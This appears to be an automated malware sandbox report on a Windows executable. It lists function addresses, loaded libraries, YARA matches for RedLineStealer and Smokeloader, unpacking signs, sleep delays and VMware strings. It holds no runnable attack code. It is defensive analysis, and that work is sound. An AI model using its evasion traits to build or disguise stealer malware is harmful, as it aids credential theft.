                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004062500_2_00406250
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041D2700_2_0041D270
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00424A740_2_00424A74
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004092300_2_00409230
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00423A340_2_00423A34
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004192DA0_2_004192DA
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043D2F00_2_0043D2F0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043C2800_2_0043C280
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004152980_2_00415298
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004082AE0_2_004082AE
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004252BA0_2_004252BA
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041CB050_2_0041CB05
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00428BC00_2_00428BC0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004143C20_2_004143C2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00402BD00_2_00402BD0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00428BE90_2_00428BE9
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004373990_2_00437399
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004393A00_2_004393A0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00416BA50_2_00416BA5
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004293AA0_2_004293AA
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004223B80_2_004223B8
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00436C000_2_00436C00
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004234100_2_00423410
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042B4FC0_2_0042B4FC
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00404CB00_2_00404CB0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004074B00_2_004074B0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041DD500_2_0041DD50
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004185780_2_00418578
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042D57E0_2_0042D57E
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004245020_2_00424502
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00421D100_2_00421D10
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0040DD250_2_0040DD25
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041D5E00_2_0041D5E0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004175820_2_00417582
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043D5800_2_0043D580
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00427DA20_2_00427DA2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004205B00_2_004205B0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042C64A0_2_0042C64A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00426E500_2_00426E50
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042B4F70_2_0042B4F7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043462A0_2_0043462A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004356300_2_00435630
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004066E00_2_004066E0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042C6E40_2_0042C6E4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00430EF00_2_00430EF0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004256F90_2_004256F9
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00422E930_2_00422E93
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00425E900_2_00425E90
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004156A00_2_004156A0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041BEA00_2_0041BEA0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00438EA00_2_00438EA0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00435EA00_2_00435EA0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00405EB00_2_00405EB0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041C6BB0_2_0041C6BB
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00415F660_2_00415F66
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004197700_2_00419770
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004097000_2_00409700
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042C7260_2_0042C726
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0042C7350_2_0042C735
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041DF800_2_0041DF80
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00402FA00_2_00402FA0
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0098C0E80_2_0098C0E8
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A80090_2_009A8009
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099C1AC0_2_0099C1AC
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099E1E70_2_0099E1E7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009861170_2_00986117
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A81080_2_009A8108
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B91070_2_009B9107
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B61070_2_009B6107
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B11570_2_009B1157
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BB2CF0_2_009BB2CF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B42FF0_2_009B42FF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009832070_2_00983207
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AB3930_2_009AB393
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AF3970_2_009AF397
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009973B20_2_009973B2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009883C70_2_009883C7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BD3070_2_009BD307
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099B3480_2_0099B348
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099734A0_2_0099734A
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A13470_2_009A1347
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099F3470_2_0099F347
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009894970_2_00989497
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009864B70_2_009864B7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099D4D70_2_0099D4D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AB4270_2_009AB427
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099144C0_2_0099144C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B64470_2_009B6447
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009845D70_2_009845D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099C5280_2_0099C528
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BD5570_2_009BD557
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009995410_2_00999541
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A96110_2_009A9611
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B96070_2_009B9607
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009987DF0_2_009987DF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BD7E70_2_009BD7E7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AD7E50_2_009AD7E5
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009877170_2_00987717
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AB7630_2_009AB763
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B48910_2_009B4891
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B58970_2_009B5897
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AC8B10_2_009AC8B1
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A08170_2_009A0817
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099D8470_2_0099D847
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AB75E0_2_009AB75E
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AC99C0_2_009AC99C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AC98D0_2_009AC98D
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009999D70_2_009999D7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009889F70_2_009889F7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099C9210_2_0099C921
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009AC94B0_2_009AC94B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009869470_2_00986947
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009899670_2_00989967
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B9A970_2_009B9A97
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BDA970_2_009BDA97
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B5AF70_2_009B5AF7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00997BA70_2_00997BA7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0098ABA70_2_0098ABA7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A5BF70_2_009A5BF7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0098CB7E0_2_0098CB7E
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A3C9B0_2_009A3C9B
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A4CF40_2_009A4CF4
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BBC080_2_009BBC08
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00983C270_2_00983C27
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00985C570_2_00985C57
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099DC470_2_0099DC47
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0098FC640_2_0098FC64
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00982E370_2_00982E37
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009B6E670_2_009B6E67
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0098DF8C0_2_0098DF8C
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099DFB70_2_0099DFB7
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00984F170_2_00984F17
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_00998F350_2_00998F35
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009A1F770_2_009A1F77
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: String function: 009942C7 appears 74 times
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: String function: 009881D7 appears 78 times
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1720
                  Source: N1sb7Ii2YD.exe, 00000000.00000002.2313130164.000000000046D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilemio@ vs N1sb7Ii2YD.exe
                  Source: N1sb7Ii2YD.exeBinary or memory string: OriginalFilenamesOdilemio@ vs N1sb7Ii2YD.exe
                  Source: N1sb7Ii2YD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.2313213319.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@12/2
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_005607A6 CreateToolhelp32Snapshot,Module32First,0_2_005607A6
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,0_2_004361E0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5924
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\667dc2ae-56dc-47b9-97d7-ab8bd72a80c0Jump to behavior
                  Source: N1sb7Ii2YD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: N1sb7Ii2YD.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeFile read: C:\Users\user\Desktop\N1sb7Ii2YD.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\N1sb7Ii2YD.exe "C:\Users\user\Desktop\N1sb7Ii2YD.exe"
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1720
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeUnpacked PE file: 0.2.N1sb7Ii2YD.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeUnpacked PE file: 0.2.N1sb7Ii2YD.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043F6EE push esp; iretd 0_2_0043F6EF
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h0_2_0043BF01
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_005631F5 pushad ; ret 0_2_005631FA
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0056347B push ebp; ret 0_2_00563480
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BC167 push eax; mov dword ptr [esp], 49484716h0_2_009BC168
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_009BF555 push esp; iretd 0_2_009BF556
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exeCode function: 0_2_0099AF5D push esp; iretd 0_2_0099AF66
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\N1sb7Ii2YD.exe TID: 1616Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
